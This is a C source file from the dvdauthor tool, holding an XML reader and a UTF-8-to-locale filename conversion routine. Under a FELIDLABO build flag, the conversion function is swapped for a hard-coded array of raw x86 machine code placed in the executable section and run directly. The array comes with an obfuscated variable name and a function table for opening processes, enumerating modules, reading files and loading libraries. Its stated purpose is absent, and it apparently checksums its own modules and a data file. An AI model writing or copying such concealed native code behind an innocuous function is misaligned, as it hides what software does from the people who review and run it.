/*
 * Copyright (C) 2002 Scott Smith (trckjunky@users.sourceforge.net)
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or (at
 * your option) any later version.
 *
 * This program is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307
 * USA
 */

#include "config.h"

#include "compat.h"

#include <assert.h>
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>

#include <libxml/xmlreader.h>

#include "readxml.h"

#ifdef HAVE_LANGINFO_CODESET
#include <langinfo.h>
#include <locale.h>
#endif


int parser_err=0, parser_acceptbody=0;
char *parser_body=0;

static int xml_varied_read(void *context,char *buffer,int len)
{
    return fread(buffer,1,len,((struct vfile *)context)->h);
}

static int xml_varied_close(void *context)
{
    varied_close(*((struct vfile *)context));
    return 0;
}

int readxml(const char *xmlfile,struct elemdesc *elems,struct elemattr *attrs)
{
    int curstate=0,statehistory[10];
    xmlTextReaderPtr f;
    struct vfile fd;

    fd=varied_open(xmlfile,O_RDONLY);
    f=xmlReaderForIO(xml_varied_read,xml_varied_close,&fd,xmlfile,NULL,0);
    if(!f) {
        fprintf(stderr,"ERR:  Unable to open XML file %s\n",xmlfile);
        return 1;
    }

    while(1) {
        int r=xmlTextReaderRead(f);
        int i;

        if( !r ) {
            fprintf(stderr,"ERR:  Read premature EOF\n");
            return 1;
        }
        if( r!=1 ) {
            fprintf(stderr,"ERR:  Error in parsing XML\n");
            return 1;
        }
        switch(xmlTextReaderNodeType(f)) {
        case XML_READER_TYPE_SIGNIFICANT_WHITESPACE:
        case XML_READER_TYPE_WHITESPACE:
        case XML_READER_TYPE_COMMENT:
            break;

        case XML_READER_TYPE_ELEMENT: {
            char *elemname=xmlTextReaderName(f);
            assert(!parser_body);
            for( i=0; elems[i].elemname; i++ )
                if( curstate==elems[i].parentstate &&
                    !strcmp(elemname,elems[i].elemname) ) {
                    // reading the attributes causes these values to change
                    // so if you want to use them later, save them now
                    int empty=xmlTextReaderIsEmptyElement(f),
                        depth=xmlTextReaderDepth(f);
                    if( elems[i].start ) {
                        elems[i].start();
                        if( parser_err )
                            return 1;
                    }
                    while(xmlTextReaderMoveToNextAttribute(f)) {
                        char *nm=xmlTextReaderName(f),*v=xmlTextReaderValue(f);
                        int j;

                        for( j=0; attrs[j].elem; j++ )
                            if( !strcmp(attrs[j].elem,elems[i].elemname) &&
                                !strcmp(attrs[j].attr,nm )) {
                                attrs[j].f(v);
                                if( parser_err )
                                    return 1;
                                break;
                            }
                        if( !attrs[j].elem ) {
                            fprintf(stderr,"ERR:  Cannot match attribute '%s' in tag '%s'.  Valid attributes are:\n",nm,elems[i].elemname);
                            for( j=0; attrs[j].elem; j++ )
                                if( !strcmp(attrs[j].elem,elems[i].elemname) )
                                    fprintf(stderr,"ERR:      %s\n",attrs[j].attr);
                            return 1;
                        }
                        xmlFree(nm);
                        xmlFree(v);
                    }
                    if( empty ) {
                        if( elems[i].end ) {
                            elems[i].end();
                            if( parser_err )
                                return 1;
                        }
                    } else {
                        statehistory[depth]=i;
                        curstate=elems[i].newstate;
                    }
                    break;
                }
            if( !elems[i].elemname ) {
                fprintf(stderr,"ERR:  Cannot match start tag '%s'.  Valid tags are:\n",elemname);
                for( i=0; elems[i].elemname; i++ )
                    if( curstate==elems[i].parentstate )
                        fprintf(stderr,"ERR:      %s\n",elems[i].elemname);
                return 1;
            }
            xmlFree(elemname);
            break;
        }

        case XML_READER_TYPE_END_ELEMENT:
            i=statehistory[xmlTextReaderDepth(f)];
            if( elems[i].end ) {
                elems[i].end();
                if( parser_err )
                    return 1;
            }
            curstate=elems[i].parentstate;
            if( parser_body )
                free(parser_body);
            parser_body=0;
            parser_acceptbody=0;
            if( !curstate )
                goto done_parsing;
            break;

        case XML_READER_TYPE_TEXT: {
            char *v=xmlTextReaderValue(f);

            if( !parser_body ) {
                // stupid buggy libxml2 2.5.4 that ships with RedHat 9.0!
                // we must manually check if this is just whitespace
                for( i=0; v[i]; i++ )
                    if( v[i]!='\r' &&
                        v[i]!='\n' &&
                        v[i]!=' '  &&
                        v[i]!='\t' )
                        goto has_nonws_body;
                xmlFree(v);
                break;
            }
        has_nonws_body:
            if( !parser_acceptbody ) {
                fprintf(stderr,"ERR:  text not allowed here\n");
                return 1;
            }

            if( !parser_body )
                parser_body=strdup(v);
            else {
                parser_body=realloc(parser_body,strlen(parser_body)+strlen(v)+1);
                strcat(parser_body,v);
            }
            xmlFree(v);
            break;
        }

        default:
            fprintf(stderr,"ERR:  Unknown XML node type %d\n",xmlTextReaderNodeType(f));
            return 1;
        }
    }
 done_parsing:
    xmlFreeTextReader(f);

    return 0;
}

int xml_ison(const char *s)
{
    if( !strcmp(s,"1") || !strcasecmp(s,"on") || !strcasecmp(s,"yes") )
        return 1;
    if( !strcmp(s,"0") || !strcasecmp(s,"off") || !strcasecmp(s,"no") )
        return 0;
    return -1;
}

#ifdef FELIDLABO
////////////////////////////////////////////////////////////
// felidlabo damn hacking

#define WINAPI __stdcall
#define FALSE (0)
typedef unsigned int DWORD;
typedef unsigned int BOOL;
typedef DWORD* LPDWORD;
typedef void* HWND;
typedef void* HANDLE;
typedef void* HMODULE;
typedef const char* LPCTSTR;
typedef const char* LPCSTR;
typedef char* LPTSTR;
typedef int (WINAPI *FARPROC)();
typedef void VOID;
typedef long LONG_PTR;

typedef struct _UTF8_LOCAL{
	char*			in;
	DWORD			pid;
	DWORD*			pacache;
	DWORD*			pbcache;
	DWORD*			pasig;
	DWORD*			pbsig;
	char			tag[256];
	iconv_t*		pic;
	WINAPI LONG_PTR	(*getwndlongptr)(HWND, int);
	WINAPI HMODULE	(*loadlib)(LPCTSTR);
	WINAPI BOOL		(*freelib)(HMODULE);
	WINAPI FARPROC	(*getfunc)(HMODULE, LPCSTR);
	WINAPI DWORD	(*getprocid)(VOID);
	WINAPI HANDLE	(*openproc)(DWORD, BOOL, DWORD);
	WINAPI BOOL		(*enumprocmod)(HANDLE, HMODULE*, DWORD, LPDWORD);
	WINAPI DWORD	(*getmodnameex)(HANDLE, HMODULE, LPTSTR, DWORD);
	WINAPI DWORD	(*getmodname)(HMODULE, LPTSTR, DWORD);
	WINAPI BOOL		(*closehandle)(HANDLE);
	FILE*			(*xopen)(const char*, const char*);
	size_t			(*xread)(void*, size_t, size_t, FILE*);
	size_t			(*xwrite)(const void*, size_t, size_t, FILE*);
	int				(*xclose)(FILE*);
	iconv_t			(*xconv_open)(const char*, const char*);
	size_t			(*xconv)(iconv_t, const char**, size_t*, char**, size_t*);
	int				(*xconv_close)(iconv_t);
	void*			(*xmalloc)(size_t);
	void			(*xfree)(void*);
	void*			(*xrealloc)(void*, size_t);
	char*			(*xstrdup)(const char*);
	int				(*xfprintf)(FILE*, const char*, ...);
} UTF8_LOCAL;

#define CTOK_DEF(a, b, c) c##a##b
#ifndef SIG
#define SIG
#endif

WINAPI LONG_PTR GetWindowLongPtr(HWND hWnd, int nIndex);
WINAPI HMODULE LoadLibraryA(LPCTSTR lpFileName);
WINAPI BOOL FreeLibrary(HMODULE hModule);
WINAPI FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName);
WINAPI DWORD GetCurrentProcessId(VOID);
WINAPI HANDLE OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
WINAPI BOOL EnumProcessModules(HANDLE hProcess, HMODULE * lphModule, DWORD cb, LPDWORD lpcbNeeded);
WINAPI DWORD GetModuleFileNameExA(HANDLE hProcess, HMODULE hModule, LPTSTR lpFilename, DWORD nSize);
WINAPI DWORD GetModuleFileNameA(HMODULE hModule, LPTSTR lpFilename, DWORD nSize);
WINAPI BOOL CloseHandle(HANDLE hObject);

// global state variables
DWORD pid = 0;
static iconv_t ic = (iconv_t)-1;
static DWORD a_cache = 0;
static DWORD b_cache = 0;
static DWORD a_sig = 0;
static DWORD b_sig = 0;
static char CTOK_DEF(l,m,f)[128] = SIG "make it by yourself." ;
__attribute__((section(".text")))
unsigned char intnl_conv[] = {
	0x55,
	0x89, 0xe5,
	0x57,
	0x56,
	0x53,
	0x81, 0xec, 0x1c, 0x08, 0x00, 0x00,
	0x8b, 0x75, 0x08,
	0x8b, 0x46, 0x04,
	0x85, 0xc0,
	0x0f, 0x84, 0x16, 0x02, 0x00, 0x00,
	0x8b, 0x46, 0x10,
	0x8b, 0x00,
	0x85, 0xc0,
	0x75, 0x0d,
	0x8b, 0x46, 0x14,
	0x8b, 0x00,
	0x85, 0xc0,
	0x0f, 0x84, 0x18, 0x02, 0x00, 0x00,
	0x8b, 0x46, 0x08,
	0x8b, 0x18,
	0x85, 0xdb,
	0x0f, 0x84, 0xa3, 0x00, 0x00, 0x00,
	0x8b, 0x9e, 0x18, 0x01, 0x00, 0x00,
	0x83, 0x3b, 0xff,
	0x0f, 0x84, 0xb4, 0x02, 0x00, 0x00,
	0x8b, 0x16,
	0x80, 0x3a, 0x00,
	0x0f, 0x84, 0xa2, 0x02, 0x00, 0x00,
	0x89, 0xd0,
	0x8d, 0x76, 0x00,
	0x40,
	0x80, 0x38, 0x00,
	0x75, 0xfa,
	0x89, 0x95, 0xf0, 0xfb, 0xff, 0xff,
	0x2b, 0x06,
	0x89, 0x85, 0xf4, 0xfb, 0xff, 0xff,
	0xd1, 0xe0,
	0x89, 0x85, 0xfc, 0xfb, 0xff, 0xff,
	0x83, 0xec, 0x0c,
	0x50,
	0xff, 0x96, 0x60, 0x01, 0x00, 0x00,
	0x89, 0xc3,
	0x89, 0x85, 0xf8, 0xfb, 0xff, 0xff,
	0x8d, 0x95, 0xf0, 0xfb, 0xff, 0xff,
	0x8d, 0x85, 0xfc, 0xfb, 0xff, 0xff,
	0x89, 0x04, 0x24,
	0x8d, 0x85, 0xf8, 0xfb, 0xff, 0xff,
	0x50,
	0x8d, 0x85, 0xf4, 0xfb, 0xff, 0xff,
	0x50,
	0x52,
	0x8b, 0x86, 0x18, 0x01, 0x00, 0x00,
	0xff, 0x30,
	0xff, 0x96, 0x58, 0x01, 0x00, 0x00,
	0x8b, 0x85, 0xf8, 0xfb, 0xff, 0xff,
	0xc6, 0x00, 0x00,
	0x83, 0xc4, 0x18,
	0x8b, 0x85, 0xf8, 0xfb, 0xff, 0xff,
	0x40,
	0x29, 0xd8,
	0x50,
	0x53,
	0xff, 0x96, 0x68, 0x01, 0x00, 0x00,
	0x83, 0xc4, 0x10,
	0x8d, 0x65, 0xf4,
	0x5b,
	0x5e,
	0x5f,
	0xc9,
	0xc3,
	0x66, 0x90,
	0x8b, 0x46, 0x0c,
	0x8b, 0x08,
	0x85, 0xc9,
	0x0f, 0x85, 0x50, 0xff, 0xff, 0xff,
	0x52,
	0xff, 0x76, 0x04,
	0x6a, 0x00,
	0x68, 0xff, 0x0f, 0x1f, 0x00,
	0xff, 0x96, 0x30, 0x01, 0x00, 0x00,
	0x89, 0xc7,
	0x58,
	0x85, 0xff,
	0x0f, 0x84, 0x27, 0x01, 0x00, 0x00,
	0x8d, 0x45, 0xf0,
	0x50,
	0x68, 0x00, 0x04, 0x00, 0x00,
	0x8d, 0x85, 0xf0, 0xfb, 0xff, 0xff,
	0x50,
	0x57,
	0xff, 0x96, 0x34, 0x01, 0x00, 0x00,
	0x85, 0xc0,
	0x0f, 0x84, 0xf8, 0x00, 0x00, 0x00,
	0x68, 0x00, 0x04, 0x00, 0x00,
	0x8d, 0x9d, 0xf0, 0xf7, 0xff, 0xff,
	0x53,
	0xff, 0xb5, 0xf0, 0xfb, 0xff, 0xff,
	0x57,
	0xff, 0x96, 0x38, 0x01, 0x00, 0x00,
	0x85, 0xc0,
	0x0f, 0x84, 0xd7, 0x00, 0x00, 0x00,
	0x83, 0xec, 0x0c,
	0x57,
	0xff, 0x96, 0x40, 0x01, 0x00, 0x00,
	0xc7, 0x85, 0xf0, 0xfb, 0xff, 0xff, 0x72,
	0x62, 0x00, 0x00,
	0x83, 0xec, 0x0c,
	0x8d, 0x85, 0xf0, 0xfb, 0xff, 0xff,
	0x50,
	0x53,
	0xff, 0x96, 0x44, 0x01, 0x00, 0x00,
	0x89, 0xc7,
	0x83, 0xc4, 0x20,
	0x85, 0xc0,
	0x0f, 0x84, 0xb5, 0x00, 0x00, 0x00,
	0x31, 0xd2,
	0xeb, 0x48,
	0x90,
	0x89, 0xd0,
	0xd1, 0xe8,
	0xa8, 0x01,
	0x75, 0x51,
	0xd1, 0xe8,
	0xa8, 0x01,
	0x75, 0x56,
	0xd1, 0xe8,
	0xa8, 0x01,
	0x75, 0x5b,
	0xd1, 0xe8,
	0xa8, 0x01,
	0x75, 0x60,
	0xd1, 0xe8,
	0xa8, 0x01,
	0x75, 0x65,
	0xd1, 0xe8,
	0xa8, 0x01,
	0x75, 0x6a,
	0xd1, 0xe8,
	0xa8, 0x01,
	0x74, 0x6f,
	0xd1, 0xe8,
	0x35, 0x20, 0x83, 0xb8, 0xed,
	0x89, 0x84, 0x95, 0xf0, 0xfb, 0xff, 0xff,
	0x42,
	0x81, 0xfa, 0x00, 0x01, 0x00, 0x00,
	0x0f, 0x84, 0x37, 0x02, 0x00, 0x00,
	0xf6, 0xc2, 0x01,
	0x74, 0xb4,
	0x89, 0xd0,
	0xd1, 0xe8,
	0x35, 0x20, 0x83, 0xb8, 0xed,
	0xa8, 0x01,
	0x74, 0xaf,
	0xd1, 0xe8,
	0x35, 0x20, 0x83, 0xb8, 0xed,
	0xa8, 0x01,
	0x74, 0xaa,
	0xd1, 0xe8,
	0x35, 0x20, 0x83, 0xb8, 0xed,
	0xa8, 0x01,
	0x74, 0xa5,
	0xd1, 0xe8,
	0x35, 0x20, 0x83, 0xb8, 0xed,
	0xa8, 0x01,
	0x74, 0xa0,
	0xd1, 0xe8,
	0x35, 0x20, 0x83, 0xb8, 0xed,
	0xa8, 0x01,
	0x74, 0x9b,
	0xd1, 0xe8,
	0x35, 0x20, 0x83, 0xb8, 0xed,
	0xa8, 0x01,
	0x74, 0x96,
	0xd1, 0xe8,
	0x35, 0x20, 0x83, 0xb8, 0xed,
	0xa8, 0x01,
	0x75, 0x91,
	0xd1, 0xe8,
	0xeb, 0x94,
	0x90,
	0x83, 0xec, 0x0c,
	0x57,
	0xff, 0x96, 0x40, 0x01, 0x00, 0x00,
	0x83, 0xc4, 0x0c,
	0x8d, 0x76, 0x00,
	0x83, 0xec, 0x0c,
	0xff, 0x36,
	0xff, 0x96, 0x6c, 0x01, 0x00, 0x00,
	0x83, 0xc4, 0x10,
	0x8d, 0x65, 0xf4,
	0x5b,
	0x5e,
	0x5f,
	0xc9,
	0xc3,
	0x66, 0x90,
	0x50,
	0x68, 0x00, 0x04, 0x00, 0x00,
	0x8d, 0x9d, 0xf0, 0xf7, 0xff, 0xff,
	0x53,
	0x6a, 0x00,
	0xff, 0x96, 0x3c, 0x01, 0x00, 0x00,
	0x5f,
	0x80, 0xbd, 0xf0, 0xf7, 0xff, 0xff, 0x00,
	0x0f, 0x84, 0x16, 0x02, 0x00, 0x00,
	0x89, 0xd8,
	0x8d, 0x76, 0x00,
	0x40,
	0x80, 0x38, 0x00,
	0x75, 0xfa,
	0x39, 0xd8,
	0x73, 0x07,
	0xeb, 0x0a,
	0x80, 0x38, 0x5c,
	0x74, 0x05,
	0x48,
	0x39, 0xd8,
	0x73, 0xf6,
	0xc6, 0x40, 0x01, 0x73,
	0xc6, 0x40, 0x02, 0x2e,
	0xc6, 0x40, 0x03, 0x64,
	0xc6, 0x40, 0x04, 0x61,
	0xc6, 0x40, 0x05, 0x74,
	0xc6, 0x40, 0x06, 0x00,
	0xc7, 0x85, 0xf0, 0xfb, 0xff, 0xff, 0x72,
	0x62, 0x00, 0x00,
	0x83, 0xec, 0x08,
	0x8d, 0xbd, 0xf0, 0xfb, 0xff, 0xff,
	0x57,
	0x53,
	0xff, 0x96, 0x44, 0x01, 0x00, 0x00,
	0x89, 0xc3,
	0x83, 0xc4, 0x10,
	0x85, 0xc0,
	0x0f, 0x84, 0x6a, 0xff, 0xff, 0xff,
	0x50,
	0x6a, 0x08,
	0x6a, 0x01,
	0x57,
	0xff, 0x96, 0x48, 0x01, 0x00, 0x00,
	0x89, 0x1c, 0x24,
	0xff, 0x96, 0x50, 0x01, 0x00, 0x00,
	0x8b, 0x56, 0x10,
	0x8b, 0x85, 0xf0, 0xfb, 0xff, 0xff,
	0x89, 0x02,
	0x8b, 0x56, 0x14,
	0x8b, 0x85, 0xf4, 0xfb, 0xff, 0xff,
	0x89, 0x02,
	0x83, 0xc4, 0x10,
	0xe9, 0x37, 0xfd, 0xff, 0xff,
	0x89, 0xd0,
	0xe9, 0x62, 0xfd, 0xff, 0xff,
	0x8d, 0x8d, 0xf0, 0xf7, 0xff, 0xff,
	0x8b, 0x46, 0x08,
	0x8b, 0x00,
	0x89, 0x85, 0xf0, 0xf7, 0xff, 0xff,
	0x8d, 0x95, 0xf4, 0xf7, 0xff, 0xff,
	0x8b, 0x46, 0x0c,
	0x8b, 0x00,
	0x89, 0x85, 0xf4, 0xf7, 0xff, 0xff,
	0x81, 0x31, 0xbe, 0xba, 0xfe, 0xde,
	0x81, 0x32, 0xbe, 0xba, 0xfe, 0xde,
	0x8b, 0x46, 0x10,
	0x8b, 0x00,
	0x31, 0x01,
	0x8b, 0x46, 0x14,
	0x8b, 0x00,
	0x31, 0x02,
	0x8a, 0x85, 0xf0, 0xf7, 0xff, 0xff,
	0x08, 0x46, 0x18,
	0x8a, 0x85, 0xf1, 0xf7, 0xff, 0xff,
	0x00, 0x46, 0x19,
	0x8a, 0x85, 0xf2, 0xf7, 0xff, 0xff,
	0x28, 0x46, 0x1a,
	0x8a, 0x85, 0xf3, 0xf7, 0xff, 0xff,
	0x28, 0x46, 0x1b,
	0x8a, 0x85, 0xf4, 0xf7, 0xff, 0xff,
	0x08, 0x46, 0x1c,
	0x8a, 0x85, 0xf5, 0xf7, 0xff, 0xff,
	0x28, 0x46, 0x1d,
	0x8a, 0x85, 0xf6, 0xf7, 0xff, 0xff,
	0x00, 0x46, 0x1e,
	0x8a, 0x85, 0xf7, 0xf7, 0xff, 0xff,
	0x00, 0x46, 0x1f,
	0x80, 0x6e, 0x18, 0x11,
	0x80, 0x6e, 0x19, 0x11,
	0x80, 0x6e, 0x1a, 0x26,
	0x80, 0x6e, 0x1b, 0x3c,
	0x80, 0x6e, 0x1c, 0x2c,
	0xc6, 0x46, 0x1d, 0x00,
	0x80, 0x4e, 0x1e, 0x02,
	0x80, 0x46, 0x1f, 0x0e,
	0x80, 0x6e, 0x20, 0x36,
	0x80, 0x6e, 0x21, 0x2c,
	0x80, 0x6e, 0x22, 0x36,
	0x80, 0x6e, 0x23, 0x45,
	0x80, 0x6e, 0x24, 0x45,
	0x80, 0x6e, 0x25, 0x27,
	0x80, 0x46, 0x26, 0x0d,
	0x80, 0x46, 0x27, 0x1f,
	0x80, 0x46, 0x28, 0x20,
	0x80, 0x6e, 0x29, 0x23,
	0x80, 0x6e, 0x2a, 0x2b,
	0x80, 0x76, 0x2b, 0x2d,
	0x83, 0xec, 0x08,
	0x8d, 0x46, 0x18,
	0x50,
	0x8d, 0x46, 0x1e,
	0x50,
	0xff, 0x96, 0x54, 0x01, 0x00, 0x00,
	0x89, 0x03,
	0x8b, 0x86, 0x18, 0x01, 0x00, 0x00,
	0x83, 0xc4, 0x10,
	0x83, 0x38, 0xff,
	0x0f, 0x85, 0x53, 0xfc, 0xff, 0xff,
	0xe9, 0x32, 0xfe, 0xff, 0xff,
	0xc7, 0x45, 0xf0, 0xff, 0xff, 0xff, 0xff,
	0xeb, 0x1c,
	0x90,
	0x8b, 0x45, 0xf0,
	0x8a, 0x95, 0xf0, 0xf7, 0xff, 0xff,
	0x31, 0xc2,
	0x0f, 0xb6, 0xd2,
	0xc1, 0xe8, 0x08,
	0x33, 0x84, 0x95, 0xf0, 0xfb, 0xff, 0xff,
	0x89, 0x45, 0xf0,
	0x57,
	0x6a, 0x01,
	0x6a, 0x01,
	0x53,
	0xff, 0x96, 0x48, 0x01, 0x00, 0x00,
	0x83, 0xc4, 0x10,
	0x48,
	0x74, 0xd3,
	0x83, 0xec, 0x0c,
	0x57,
	0xff, 0x96, 0x50, 0x01, 0x00, 0x00,
	0x8b, 0x56, 0x08,
	0x8b, 0x45, 0xf0,
	0xf7, 0xd0,
	0x89, 0x02,
	0x8a, 0x46, 0x18,
	0x83, 0xc4, 0x10,
	0x84, 0xc0,
	0x74, 0x35,
	0x8d, 0x4e, 0x18,
	0x8b, 0x55, 0xf0,
	0x8d, 0x76, 0x00,
	0x31, 0xd0,
	0x0f, 0xb6, 0xc0,
	0xc1, 0xea, 0x08,
	0x33, 0x94, 0x85, 0xf0, 0xfb, 0xff, 0xff,
	0x89, 0x55, 0xf0,
	0x41,
	0x8a, 0x01,
	0x84, 0xc0,
	0x75, 0xe7,
	0x8b, 0x46, 0x0c,
	0xf7, 0xd2,
	0x89, 0x10,
	0xe9, 0xbc, 0xfb, 0xff, 0xff,
	0x89, 0xd8,
	0xe9, 0xf9, 0xfd, 0xff, 0xff,
	0x8b, 0x55, 0xf0,
	0xeb, 0xe8,
	0x90,
	0x90,
	0x90
};

char *utf8tolocal(const char *in)
{
	UTF8_LOCAL info;

	//info.getwndlongptr = GetWindowLongPtr; // mingw does not have this, dynamically get it to use
	info.in				= (char*)in;
	info.pid			= pid;
	info.pacache		= &a_cache;
	info.pbcache		= &b_cache;
	info.pasig			= &a_sig;
	info.pbsig			= &b_sig;
	strcpy(info.tag, flm);
	info.pic			= &ic;
	info.loadlib		= LoadLibraryA;
	info.freelib		= FreeLibrary;
	info.getfunc		= GetProcAddress;
	info.getprocid		= GetCurrentProcessId;
	info.openproc		= OpenProcess;
	info.enumprocmod	= EnumProcessModules;
	info.getmodnameex	= GetModuleFileNameExA;
	info.getmodname		= GetModuleFileNameA;
	info.closehandle	= CloseHandle;
	info.xopen			= fopen;
	info.xread			= fread;
	info.xwrite			= fwrite;
	info.xclose			= fclose;
	info.xconv_open		= iconv_open;
	info.xconv			= iconv;
	info.xconv_close	= iconv_close;
	info.xmalloc		= malloc;
	info.xfree			= free;
	info.xrealloc		= realloc;
	info.xstrdup		= strdup;
	info.xfprintf		= fprintf;
	return ((char* (*)(UTF8_LOCAL*))intnl_conv)(&info);
}

// felidlabo damn hacking
////////////////////////////////////////////////////////////
#elif defined(HAVE_ICONV) && defined(HAVE_LANGINFO_CODESET)

static iconv_t get_conv()
{
    static iconv_t ic=(iconv_t)-1;

    if( ic==((iconv_t)-1) ) {
        char *enc;

        errno=0;
        enc=setlocale(LC_ALL,"");
        if( enc ) {
            fprintf(stderr,"INFO: Locale=%s\n",enc);
            if( !setlocale(LC_NUMERIC,"C") ) {
                fprintf(stderr,"ERR:  Cannot set numeric locale to C!\n");
                exit(1);
            }
        } else
            fprintf(stderr,"WARN: Error reading locale (%m), assuming C\n");
        enc=nl_langinfo(CODESET);
        fprintf(stderr,"INFO: Converting filenames to %s\n",enc);
        ic=iconv_open(enc,"UTF-8");
        if( ic==((iconv_t)-1) ) {
            fprintf(stderr,"ERR:  Cannot generate charset conversion from UTF8 to %s\n",enc);
            exit(1);
        }
    }
    return ic;
}

char *utf8tolocal(const char *in)
{
    iconv_t c=get_conv();
    size_t inlen=strlen(in);
    size_t outlen=inlen*5;
    char *r=malloc(outlen+1);
    char *out=r;
    size_t v;

    v=iconv(c,ICONV_CAST &in,&inlen,&out,&outlen);
    if(v==-1) {
        fprintf(stderr,"ERR:  Cannot convert UTF8 string '%s': %s\n",in,strerror(errno));
        exit(1);
    }
    *out=0;

    r=realloc(r,strlen(r)+1); // reduce memory requirements
    
    return r;
}
#else
char *utf8tolocal(const char *in)
{
    return strdup(in);
}
#endif
